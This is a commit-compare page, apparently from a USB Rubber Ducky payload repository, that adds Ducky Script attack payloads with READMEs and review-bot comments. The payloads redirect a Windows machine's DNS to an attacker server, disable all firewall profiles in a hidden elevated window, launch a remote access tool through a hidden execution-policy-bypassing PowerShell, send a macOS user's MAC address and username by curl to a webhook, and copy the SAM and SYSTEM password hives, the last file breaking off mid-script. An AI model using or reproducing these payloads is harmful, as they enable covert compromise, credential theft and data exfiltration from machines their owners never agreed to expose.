Compare commits
61 Commits
e687deb799
...
f375621da1
Author | SHA1 | Date |
---|---|---|
cribb-it | f375621da1 | |
Peaks | f3053273a4 | |
Peaks | d5e02033fe | |
bst04 | b2b8cf8b2e | |
Peaks | 3333420b26 | |
bst04 | 8cd44e511c | |
bst04 | bad6fb6040 | |
bst04 | 9c3f29df37 | |
Luu | 3604620ab9 | |
Luu | 261e82a829 | |
Peaks | 5f13d6090f | |
Luu | 1a1c79d5ba | |
Luu | 203d986ae4 | |
Peaks | 6ae414c545 | |
Luu | aeffdbfcbd | |
Luu | 9a5857b2af | |
Luu | aa5afab7ed | |
Luu | f6fb02fe34 | |
Luu | 0bb2f83a10 | |
Luu | 4a6e17773d | |
Luu | 81ae8f0e8c | |
Luu | 554b3066b7 | |
Peaks | 7f56669213 | |
Peaks | 645f1e9fe3 | |
bst04 | 59d4883817 | |
Aleff | 1ea9c8a689 | |
Aleff | 47fa68ecd9 | |
bst04 | b9de56e67d | |
bst04 | 0403e79d70 | |
Peaks | a8c264c752 | |
UberGuidoZ | a18f4561e2 | |
UberGuidoZ | ad644d8849 | |
UberGuidoZ | 8c3110d8f1 | |
UberGuidoZ | a94beb0c75 | |
UberGuidoZ | 467075df68 | |
UberGuidoZ | e3c28b36ee | |
Peaks | 44af31e74b | |
Mavis Coffey | cacb21ad7e | |
Mavis Coffey | 61eb88ab6c | |
Mavis Coffey | 8be0f9a092 | |
Mavis Coffey | 63e0c18618 | |
Mavis Coffey | 81807425f5 | |
Mavis Coffey | 083951025f | |
Mavis Coffey | 1a5aa0bd08 | |
Mavis Coffey | a323fc3281 | |
UberGuidoZ | b2c8194099 | |
UberGuidoZ | 97745c360d | |
Mavis Coffey | 420a174f93 | |
Mavis Coffey | c8c6a75d33 | |
Mavis Coffey | 4e89426355 | |
Mavis Coffey | 566683c428 | |
Mavis Coffey | 5ed41467e3 | |
Mavis Coffey | a74d21e848 | |
Mavis Coffey | 0f85a6936e | |
Mavis Coffey | d9baab6395 | |
Mavis Coffey | cf0c83d37c | |
Mavis Coffey | 8293bf5d4d | |
Mavis Coffey | 6ad0b7836c | |
mavisinator30001 | 8073d4d9cd | |
cribb-it | 59c5175b3e | |
cribb-it | 61b9a826cf |
|
@ -0,0 +1,27 @@
|
||||||
|
# Spoof DNS - Windows ✅
|
||||||
|
|
||||||
|
DNS Spoofer
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the primary and secondary dns servers
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
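Review bot: the Settings list covers only the primary and secondary DNS servers, although the payload in this change also defines `#interface`, and the README gives no way to undo the change. Add the adapter name as a setting and a one-line revert step (for example `Set-DnsClientServerAddress -InterfaceAlias "<adapter>" -ResetServerAddresses`) so a test machine can be returned to its assigned resolvers. In the Credits block the avatar URL carries two query separators (`?v=4?raw=true`) and `align=center` is unquoted.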
@ -0,0 +1,69 @@
|
||||||
|
REM Title: DNS changer
|
||||||
|
REM Author: luu176
|
||||||
|
REM Description: Changes DNS address of windows machine in powershell
|
||||||
|
REM Target: Windows 10/11
|
||||||
|
|
||||||
|
REM wifi interface should be named: Wi-Fi
|
||||||
|
DEFINE #interface Ethernet
|
||||||
|
DEFINE #primaryDNS 192.168.1.3
|
||||||
|
DEFINE #secondaryDNS 1.1.1.1
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
GUI r
|
||||||
|
DELAY 150
|
||||||
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
|
||||||
|
REM below is to blink the LED when payload done
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < 9 )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
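Review bot: `REM wifi interface should be named: Wi-Fi` contradicts `DEFINE #interface Ethernet` on the next line; make the comment and the default agree. The PASSIVE_WINDOWS_DETECT block sets `$_OS`, but nothing after `END_EXTENSION` tests it, so the Windows-only keystrokes are typed on whatever host is attached. Wrap them in `IF ($_OS == WINDOWS) THEN` ... `END_IF`, as the extension's own usage block shows.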
@ -0,0 +1,24 @@
|
||||||
|
# Disable WiFi 🛜
|
||||||
|
|
||||||
|
This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Disable WiFi
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Execution
|
||||||
|
- **Target**: MacOS
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
|
||||||
|
`DEFINE #MODE off`
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
|
||||||
|
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||||
|
3. After readiness is confirmed, the script:
|
||||||
|
- Runs commands to open **Terminal**.
|
||||||
|
- Run or stop the WiFi
|
|
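Review bot: the `### Dependencies` section lists no dependency; it holds the `#MODE` setting, and its bullet still carries the `REM` prefix copied from the payload. Rename the section to match what it contains and drop `REM`. The intro tells the reader to replace "off" with "on" in the script while this section says to change `#MODE`; describe one mechanism only. In "How It Works", "littebit" is a typo and "Run or stop the WiFi" should use the same on/off wording as the rest of the file.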
@ -0,0 +1,53 @@
|
||||||
|
REM_BLOCK
|
||||||
|
##################################
|
||||||
|
# #
|
||||||
|
# Title : Disable WiFi #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Execution #
|
||||||
|
# Target : MacOS #
|
||||||
|
# #
|
||||||
|
##################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
|
||||||
|
DEFINE #MODE off
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||||
|
DELAY 200
|
||||||
|
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN TERMINAL
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
|
||||||
|
DELAY 250
|
||||||
|
GUI q
|
|
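Review bot: the `REM` above `DEFINE #MODE off` talks about wanting to "run the WiFi", but the `networksetup -setnetworkserviceenabled Wi-Fi #MODE` line enables or disables the network service named `Wi-Fi`; reword the comment to say so and state that the value must be exactly `on` or `off`, since it is substituted unchecked. The service name is fixed inside the command while the mode is a DEFINE; declaring both at the top would keep the settings in one place.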
@ -0,0 +1,23 @@
|
||||||
|
# Firewall Deactivator - Windows ✅
|
||||||
|
|
||||||
|
Deactivate firewall on windows
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A payload used to deactivate all firewalls on windows in a discrete manner.
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
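Review bot: "discrete" in the Description should be "discreet", and the README says neither that the command needs an elevated prompt nor how to turn the profiles back on. Add a restore line such as `Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True` so a test machine is not left unprotected. The avatar URL in Credits has a malformed query string (`?v=4?raw=true`).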
@ -0,0 +1,61 @@
|
||||||
|
REM Title: Firewall deactivator
|
||||||
|
REM Author: luu176
|
||||||
|
REM Description: Deactivate all firewalls in windows machine using hidden powershell
|
||||||
|
REM Target: Windows
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 200
|
||||||
|
STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < 9 )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
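Review bot: the header's "Deactivate all firewalls" overstates what the `STRINGLN` line does, which is to set the Domain, Public and Private profiles through `Set-NetFirewallProfile`; narrow the Description to that. `$_OS` is set by the extension but never tested, so the `GUI r` sequence runs on any host; guard it with `IF ($_OS == WINDOWS) THEN` as the extension's usage block shows.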
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,41 @@
|
||||||
|
REM TITLE R.A.T
|
||||||
|
REM AUTHOR TRIBBIC
|
||||||
|
REM DESCRIPTION Set up a R.A.T on the target windows machine
|
||||||
|
REM DUCKY SCRIPT 3
|
||||||
|
|
||||||
|
REM USERNAME to login to the R.A.T
|
||||||
|
DEFINE #USERNAME name
|
||||||
|
REM Your IP Address use https://www.ipchicken.com/ to get your IP
|
||||||
|
DEFINE #IPADDRESS 192.168.1.1
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 200
|
||||||
|
STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1')
|
|
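Review bot: everything this payload does on the host happens inside `R.ps1`, which the final `STRINGLN` runs through `iex` with `-EP Bypass` in a hidden window, yet no hunk on this page shows that script and the preceding file's diff is suppressed as too long. The change cannot be reviewed until the script is available in readable form. The header also lacks a target line, and `DETECT_READY` does not identify the OS, so the Windows-only `GUI r` sequence is not guarded.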
@ -0,0 +1,22 @@
|
||||||
|
# RAT
|
||||||
|
- Author: TRIBBIC
|
||||||
|
- Version: 1.0
|
||||||
|
- Target: Windows 10 (Powershell 5.1+)
|
||||||
|
- Category: Execution
|
||||||
|
- Attackmode: HID & Storage
|
||||||
|
- Ducky Script Version: 3
|
||||||
|
|
||||||
|
## Setup
|
||||||
|
In the payload.txt change the two DEFINE's
|
||||||
|
|
||||||
|
\#USERNAME Should be your login name
|
||||||
|
|
||||||
|
\#IPADDRESS Should be your IP Address
|
||||||
|
|
||||||
|
## Description
|
||||||
|
Create a R.A.T using Windows Powershell on Targets PC
|
||||||
|
|
||||||
|
## Change Log
|
||||||
|
| Version | Changes |
|
||||||
|
| ------- | --------------- |
|
||||||
|
| 1.0 | Initial release |
|
|
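Review bot: the Description is a single line that does not say what `R.ps1` changes on the host, what it connects to or listens on, or how to remove it afterwards; add those, along with the requirement that the storage volume be labelled `DUCKY`, which the payload line depends on. In Setup, "DEFINE's" should be "DEFINEs", and "Targets PC" should read "the target's PC".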
@ -0,0 +1,25 @@
|
||||||
|
# Exfiltrate Mac Address - MacOS
|
||||||
|
|
||||||
|
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Exfiltrate Mac Address
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Exfiltration
|
||||||
|
- **Target**: MacOS
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
- Set the #WEBHOOK to complete the exfiltration
|
||||||
|
`DEFINE #WEBHOOK example`
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
|
||||||
|
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||||
|
3. After readiness is confirmed, the script:
|
||||||
|
- Runs commands to open **Terminal**.
|
||||||
|
- Acquire the mac address and the system user name
|
||||||
|
- Send this informations through the Webhook
|
|
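Review bot: the heading and the Title field name only the MAC address, while the intro and step 3 say the username is collected and sent as well; state both in the Details so the data leaving the machine is described accurately in one place. The `### Dependencies` section holds a setting rather than a dependency. "littebit" and "this informations" are typos.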
@ -0,0 +1,55 @@
|
||||||
|
REM_BLOCK
|
||||||
|
####################################################
|
||||||
|
# #
|
||||||
|
# Title : Exfiltrate Mac Address - MacOS #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Exfiltration #
|
||||||
|
# Target : MacOS #
|
||||||
|
# #
|
||||||
|
####################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Set the #WEBHOOK to complete the exfiltration
|
||||||
|
DEFINE #WEBHOOK example
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||||
|
DELAY 200
|
||||||
|
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN TERMINAL
|
||||||
|
DELAY 750
|
||||||
|
STRINGLN mac=$(networksetup -getmacaddress en0)
|
||||||
|
DELAY 750
|
||||||
|
STRINGLN name=$(id -un)
|
||||||
|
DELAY 850
|
||||||
|
STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK
|
|
@ -0,0 +1,12 @@
|
||||||
|
# IP-OUT
|
||||||
|
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Useful Tips
|
||||||
|
|
||||||
|
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
||||||
|
|
||||||
|
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
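Review bot: the README says the `ipconfig` output is saved as a text file on the USB but never names it; mention `exfil.txt` and that the payload stops on non-Windows hosts, both of which are visible in the payload. "educational purposed only" should be "purposes", and the run of empty lines between the intro and "Useful Tips" can be collapsed.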
@ -0,0 +1,63 @@
|
||||||
|
REM Title: IP-Out
|
||||||
|
REM Author: Mavisinator30001
|
||||||
|
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||||
|
REM Target: Any Windows System
|
||||||
|
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||||
|
DEFINE #DRIVELABEL DUCKY
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
DELAY 500
|
||||||
|
GUI r
|
||||||
|
DELAY 300
|
||||||
|
STRINGLN Powershell
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
ALT F4
|
||||||
|
ATTACKMODE OFF
|
||||||
|
HIDE_PAYLOAD
|
|
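Review bot: `IF $_OS != WINDOWS` is written without parentheses or `THEN`, unlike every other conditional in this file (for example `IF ($_OS == WINDOWS) THEN`); use `IF ($_OS != WINDOWS) THEN` so the non-Windows stop is parsed as intended. The Description says the payload "prints the current IP", but the command writes the full `ipconfig` output to `exfil.txt`; describe it that way.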
@ -0,0 +1,29 @@
|
||||||
|
# Exfiltrate NTLM Hash - Windows ✅
|
||||||
|
|
||||||
|
A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
|
||||||
|
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
|
||||||
|
- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align="center">
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>GitHub
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
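Review bot: "NTLM hash files" is not what gets copied; the payload saves the SAM and SYSTEM registry hives with `reg save`, and the README should use those terms and say that the step needs an elevated prompt. Under Settings, `#numBlinks` is a DEFINE, not a variable, and the Drive Label entry should name `#driveLabel`. The last sentence of the Description is missing its full stop.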
@ -0,0 +1,81 @@
|
||||||
|
REM_BLOCK
|
||||||
|
TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
|
||||||
|
AUTHOR Luu176
|
||||||
|
DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users
|
||||||
|
on the current Windows device) to the Rubber Ducky's SD card for further analysis.
|
||||||
|
It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to
|
||||||
|
the defined storage drive on the Ducky device.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #driveLabel DUCKY
|
||||||
|
REM below you can set the number of blinks for the caps lock when finished (default 9)
|
||||||
|
DEFINE #numBlinks 9
|
||||||
|
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
